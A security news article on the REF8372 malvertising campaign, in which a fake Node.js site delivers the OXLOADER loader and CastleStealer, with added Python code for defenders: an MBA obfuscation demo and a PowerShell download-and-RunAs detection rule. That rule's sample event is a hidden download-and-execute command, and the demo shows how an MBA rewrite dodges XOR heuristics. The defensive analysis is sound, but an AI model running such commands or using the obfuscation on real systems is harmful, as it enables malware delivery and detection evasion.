
Cybersecurity researchers have disclosed details of a new campaign that delivers CastleStealer by means of a previously unreported malware loader dubbed OXLOADER.
According to Elastic Security Labs, the campaign uses malicious Google Ads as its starting point for distributing the malware. Evidence indicates that the threat actor is likely Russian-speaking and financially motivated, owing to the presence of explicit exclusions that prevent infecting machines located in the Commonwealth of Independent States (CIS) region. The campaign has been codenamed REF8372.
"The loader uses multiple obfuscation layers (control-flow flattening, opaque predicates, mixed Boolean-Arithmetic), self-modifying decryption stubs, and abuses the Windows .reloc section to stage shellcode," researchers Daniel Stepanic and Jia Yu Chan said in a technical breakdown.
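To make the "mixed Boolean-Arithmetic" layer concrete, the following is an added example, not code from Elastic's write-up or from OXLOADER itself. It shows what an MBA rewrite does to a trivial decryption stub (the XOR that an analyst expects to see is replaced by an identity mixing bitwise and arithmetic operators that computes the same value) and the equivalence check an analyst runs before simplifying such an expression away. The 32-bit word size, the identities used, the key and the encrypted sample string are all constructed for the demonstration.

```python
"""
Added example: mixed Boolean-Arithmetic (MBA) rewrites of add, sub and xor,
a decoder loop in plain and MBA form, and a random-probing equivalence check.
Nothing here is taken from the loader discussed in the article.
"""
import random

MASK = 0xFFFFFFFF  # model 32-bit unsigned arithmetic (assumed word size)


# Plain operations and their MBA equivalents. Each identity holds for every
# pair of inputs mod 2**32. The rewritten forms hide the original operator:
# an add becomes xor plus a shifted and, an xor becomes or minus and.
def plain_add(x, y):
    return (x + y) & MASK


def mba_add(x, y):
    return ((x ^ y) + 2 * (x & y)) & MASK


def plain_sub(x, y):
    return (x - y) & MASK


def mba_sub(x, y):
    return ((x ^ y) - 2 * ((~x) & y)) & MASK


def plain_xor(x, y):
    return (x ^ y) & MASK


def mba_xor(x, y):
    return ((x | y) - (x & y)) & MASK


def decode_plain(buf, key):
    """Readable single-byte XOR decoder."""
    return bytes(b ^ key for b in buf)


def decode_mba(buf, key):
    """Same decoder with the XOR replaced by its MBA form: the loop body no
    longer contains an xor at all, so a byte-pattern or operator-based
    heuristic for 'xor decryption loop' does not fire on it."""
    return bytes(mba_xor(b, key) for b in buf)


def check_equivalence(f, g, trials=10000, seed=1):
    """Analyst-side sanity check: probe the corner cases where carries and
    wrap-around matter, then random 32-bit pairs. Returns True when no
    counterexample is found. This is evidence, not proof; a solver query
    over the bit-vector expressions would prove it."""
    rng = random.Random(seed)
    corners = [0, 1, 0x7FFFFFFF, 0x80000000, MASK]
    pairs = [(a, b) for a in corners for b in corners]
    pairs += [(rng.getrandbits(32), rng.getrandbits(32)) for _ in range(trials)]
    return all(f(a, b) == g(a, b) for a, b in pairs)


# Constructed sample: a string encrypted under an illustrative key.
KEY = 0x5A
SAMPLE_CIPHERTEXT = bytes(b ^ KEY for b in b"stage2.dll")

if __name__ == "__main__":
    for name, f, g in [("add", plain_add, mba_add),
                       ("sub", plain_sub, mba_sub),
                       ("xor", plain_xor, mba_xor)]:
        print(f"{name}: equivalent={check_equivalence(f, g)}")
    print(decode_plain(SAMPLE_CIPHERTEXT, KEY) == decode_mba(SAMPLE_CIPHERTEXT, KEY))
```

Real MBA obfuscators chain several such identities and fold in opaque predicates, so the expressions get much larger than these; the analyst's workflow is the same, though: confirm equivalence first, then replace the expression with the simple operator it hides.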
The attack begins when unsuspecting users enter queries such as "lts version of node.js" into search engines like Google and are redirected to a fake website ("node-js[.]prentiva99[.]info") surfaced via bogus ads published under the verified name "ВОЛОДИМИР ТЕРЕЩЕНКО", which is purportedly based in Ukraine.
It is currently unknown whether the advertiser account is linked to the actual threat actor, or whether it is a front account or a purchased identity. The advertiser account, along with its ad campaigns, was removed from Google on May 14, 2026.
Users who interact with the site are served a batch script hosted on Storj, a decentralized, open-source cloud storage platform. The abuse of Storj once again illustrates how threat actors continue to leverage legitimate services to evade domain-based reputation filters.

Running the batch script displays a bogus installation wizard user interface (UI) while stealthily downloading the next-stage payload, a Storj-hosted executable dubbed OXLOADER, via a PowerShell command and executing it with -Verb RunAs to trigger a Windows User Account Control (UAC) prompt.
The attack then employs DLL side-loading to launch a rogue DLL, which proceeds to decrypt and execute the CastleStealer payload. OXLOADER also uses techniques such as control-flow flattening (CFF) and mixed Boolean-Arithmetic (MBA) to evade static detection, while taking steps to ensure it does not run in sandboxed environments.
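The delivery chain above (a batch script spawning PowerShell that fetches an executable from Storj and relaunches it with -Verb RunAs) is something a detection engineer can hunt for in process-creation telemetry. The following is an added example, not a rule from Elastic and not tied to OXLOADER's actual command lines: a small scoring rule over constructed process events. The event field names, the sample command lines and the Storj gateway hostname pattern (storjshare.io) are assumptions made for the demo; the only thing taken from the article is the shape of the chain.

```python
"""
Added example: hunt for cmd.exe -> PowerShell chains that download a payload
and re-launch it elevated with -Verb RunAs, as in the delivery described
above. Field names and events are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # assumed field: full path of the parent process
    image: str          # assumed field: full path of the created process
    command_line: str   # assumed field: full command line of the new process


# Common PowerShell/.NET ways to pull a file or script body from the network.
DOWNLOAD_RE = re.compile(
    r"\b(iwr|invoke-webrequest|invoke-restmethod|curl|wget|"
    r"downloadfile|downloadstring|start-bitstransfer)\b", re.I)
# Explicit elevation request; this is what produces the UAC prompt.
RUNAS_RE = re.compile(r"-verb\s+runas\b", re.I)
# Assumed Storj public gateway/link-share hostname pattern.
STORJ_RE = re.compile(r"https?://[^\s\"']*storjshare\.io", re.I)

POWERSHELL = ("\\powershell.exe", "\\pwsh.exe")


def evaluate(ev):
    """Return a finding dict for a suspicious event, or None.

    Download + RunAs in one PowerShell command line is the core signal; a
    cmd.exe parent (the batch script) and a Storj host raise confidence.
    """
    if not ev.image.lower().endswith(POWERSHELL):
        return None
    indicators = []
    if ev.parent_image.lower().endswith("\\cmd.exe"):
        indicators.append("batch_parent")
    if DOWNLOAD_RE.search(ev.command_line):
        indicators.append("download")
    if RUNAS_RE.search(ev.command_line):
        indicators.append("uac_prompt")
    if STORJ_RE.search(ev.command_line):
        indicators.append("storj_host")
    if "download" not in indicators or "uac_prompt" not in indicators:
        return None
    severity = "high" if "storj_host" in indicators else "medium"
    return {"severity": severity, "indicators": indicators,
            "command_line": ev.command_line}


def hunt(events):
    """Evaluate every event and return the findings."""
    return [f for f in (evaluate(e) for e in events) if f is not None]


# Constructed sample events: one matching the chain, two benign look-alikes.
PS_PATH = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("C:\\Windows\\System32\\cmd.exe", PS_PATH,
              'powershell -w hidden -c "iwr https://link.storjshare.io/s/abc/setup.exe '
              '-o $env:TEMP\\setup.exe; Start-Process $env:TEMP\\setup.exe -Verb RunAs"'),
    ProcEvent("C:\\Windows\\explorer.exe", PS_PATH,
              'powershell -c "Get-ChildItem C:\\Users"'),
    ProcEvent("C:\\Windows\\System32\\cmd.exe", PS_PATH,
              'powershell -c "Start-Process notepad -Verb RunAs"'),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["severity"], finding["indicators"])
```

Requiring both the download and the elevation request in one command line keeps the rule from firing on every admin script that uses -Verb RunAs; the third sample event shows that case staying quiet. In production the Storj pattern would be one entry in a list of link-sharing and object-storage hosts rather than a hard-coded regex, and the rule would additionally join on the fake-installer process that wrote the batch file.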
CastleStealer is a .NET information stealer that was recently distributed alongside CastleLoader via a ClickFix-style lure masquerading as a free image-editing tool, as part of a campaign codenamed BackgroundFix. CastleLoader is attributed to a threat activity cluster known as GrayBravo.
"OXLOADER is in an early operational phase, but the engineering behind it suggests this family is worth watching," Elastic said. "The code obfuscation, anti-VM measures, benign-looking code used to masquerade its binaries, and unique staging techniques reflect deliberate engineering choices to evade analysis."
"That investment is paying off, resulting in low detection rates across static engines and detonation runs, giving OXLOADER a window to operate before it gets hunted down."

